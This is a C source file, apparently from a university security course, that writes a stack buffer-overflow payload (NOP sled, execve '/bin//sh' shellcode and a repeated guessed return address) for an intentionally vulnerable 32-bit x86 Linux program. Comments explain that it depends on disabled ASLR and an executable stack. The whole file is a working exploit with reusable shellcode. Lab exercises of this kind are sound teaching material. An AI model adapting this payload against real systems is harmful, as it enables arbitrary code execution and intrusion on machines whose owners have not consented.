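/*****************************************
** File: exploit.c
** Author: RJ Joyce
** Date: 9/19/2018
** E-mail: joyce8@umbc.edu
**
** Writes exploit.txt: a stack-smashing payload for the course's
** intentionally vulnerable 32-bit x86 Linux target. Layout is
**
**   NOP sled | execve("/bin//sh") shellcode | guessed return address x N
**
** NOTE(review): this only works if the target runs with ASLR disabled
** and an executable stack (no NX) -- the return address is a fixed
** stack location found in gdb and the shellcode executes from the
** stack. Re-run the gdb measurement if the target or its environment
** (env vars, argv, kernel) changes; the address will move.
*****************************************/
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Adapted from https://github.com/npapernot/buffer-overflow-attack
 * x86-32 execve("/bin//sh", ["/bin//sh", NULL], NULL). Contains no
 * 0x00 byte, which matters: the vulnerable program presumably copies the
 * payload as a C string, and a NUL would cut the copy short. */
char shellcode[] =
    "\x31\xc0"          /* xorl  %eax,%eax        */
    "\x50"              /* pushl %eax             */
    "\x68""//sh"        /* pushl $0x68732f2f      */
    "\x68""/bin"        /* pushl $0x6e69622f      */
    "\x89\xe3"          /* movl  %esp,%ebx        */
    "\x50"              /* pushl %eax             */
    "\x53"              /* pushl %ebx             */
    "\x89\xe1"          /* movl  %esp,%ecx        */
    "\x99"              /* cdql                   */
    "\xb0\x0b"          /* movb  $0x0b,%al        */
    "\xcd\x80"          /* int   $0x80            */
    ;

enum {
    PAYLOAD_LEN  = 600, /* bytes written to exploit.txt; per the original note,
                           ~100 more than the target buffer being overflowed */
    NOP_SLED_LEN = 400, /* leading NOPs; any landing inside them reaches the shellcode */
    ADDR_WIDTH   = 4    /* 32-bit target: a saved return address is 4 bytes */
};

/* Stack address observed in gdb on the target, and a fudge offset that
 * moves the guess down into the NOP sled. "You might need to try some
 * different offsets" (original author) -- the frame layout differs between
 * gdb and a normal run, so STACK_OFFSET is a tunable. */
#define BASE_STACK_ADDR 0xbffff4e0u
#define STACK_OFFSET    0x200u

/*
 * build_payload: fill buf[0..len) with the exploit bytes.
 *
 *   buf  - destination, at least NOP_SLED_LEN + shellcode bytes long
 *   len  - size of buf in bytes
 *   addr - 32-bit return address to repeat after the shellcode; written
 *          little-endian explicitly, since the target is x86, rather than
 *          through a host `long` (which is 8 bytes on x86-64 hosts and
 *          would corrupt the layout).
 *
 * Returns 0 on success, -1 if buf is NULL, len is too small, or the
 * finished payload contains a NUL byte (e.g. an address with a zero
 * byte), which a string-based copy in the target would truncate on.
 *
 * Every byte of buf is written: the address bytes are laid down at
 * 4-byte strides over the whole buffer first, then the sled and
 * shellcode overwrite the front. The original version wrote one `long`
 * per stride with `i < len`, which ran 3 (or 7) bytes past the end of
 * the allocation on the last iteration; the per-byte loop below never
 * leaves [0, len).
 */
static int build_payload(unsigned char *buf, size_t len, uint32_t addr)
{
    const size_t sc_len = sizeof shellcode - 1;   /* drop the C-string terminator */

    if (buf == NULL || len < NOP_SLED_LEN + sc_len) {
        return -1;
    }

    /* Byte i of the buffer gets byte (i mod 4) of addr, little-endian, so
     * every 4-aligned offset holds a full copy of the address. */
    for (size_t i = 0; i < len; i++) {
        buf[i] = (unsigned char)((addr >> (8 * (i % ADDR_WIDTH))) & 0xffu);
    }

    memset(buf, 0x90, NOP_SLED_LEN);              /* 0x90 = NOP on x86 */
    memcpy(buf + NOP_SLED_LEN, shellcode, sc_len);

    /*
     * At this point, buf looks like this:
     * N = NOP, S = Shellcode, R = Return address
     * NNNNNNNNNNNNNNNNNNNNSSSSSSSSRRRRRRRRRRRRR
     *
     * NOTE(review): the address copies sit at offsets that are multiples
     * of 4 from the start of buf. If the target's saved return address is
     * not 4-aligned relative to the start of its buffer, none of the
     * copies lands on it exactly; shifting the sled length by 1-3 bytes
     * is the usual fix -- confirm against the target's frame in gdb.
     */
    if (memchr(buf, '\0', len) != NULL) {
        return -1;
    }
    return 0;
}

/*
 * Entry point: build the payload and write it to exploit.txt.
 *
 * Returns 0 on success, 1 on allocation, payload or file failure. The
 * original silently returned 0 when fopen() failed and never closed the
 * stream or freed the buffer; failures are now reported on stderr and
 * fclose()'s status is checked, since that is where a write error to a
 * full disk actually surfaces.
 */
int main(void)
{
    unsigned char *buf = malloc(PAYLOAD_LEN);
    if (buf == NULL) {
        exit(1);
    }

    const uint32_t ret_addr = BASE_STACK_ADDR - STACK_OFFSET;
    if (build_payload(buf, PAYLOAD_LEN, ret_addr) != 0) {
        fprintf(stderr, "exploit: payload too short or contains a NUL byte\n");
        free(buf);
        return 1;
    }

    int rc = 0;
    FILE *fp = fopen("exploit.txt", "wb");
    if (fp == NULL) {
        perror("fopen exploit.txt");
        rc = 1;
    } else {
        /* fwrite with an explicit length: fputs() would stop at the first
         * NUL, so the file's size would silently depend on the bytes. */
        if (fwrite(buf, 1, PAYLOAD_LEN, fp) != PAYLOAD_LEN) {
            perror("fwrite exploit.txt");
            rc = 1;
        }
        if (fclose(fp) != 0) {
            perror("fclose exploit.txt");
            rc = 1;
        }
    }

    free(buf);
    return rc;
}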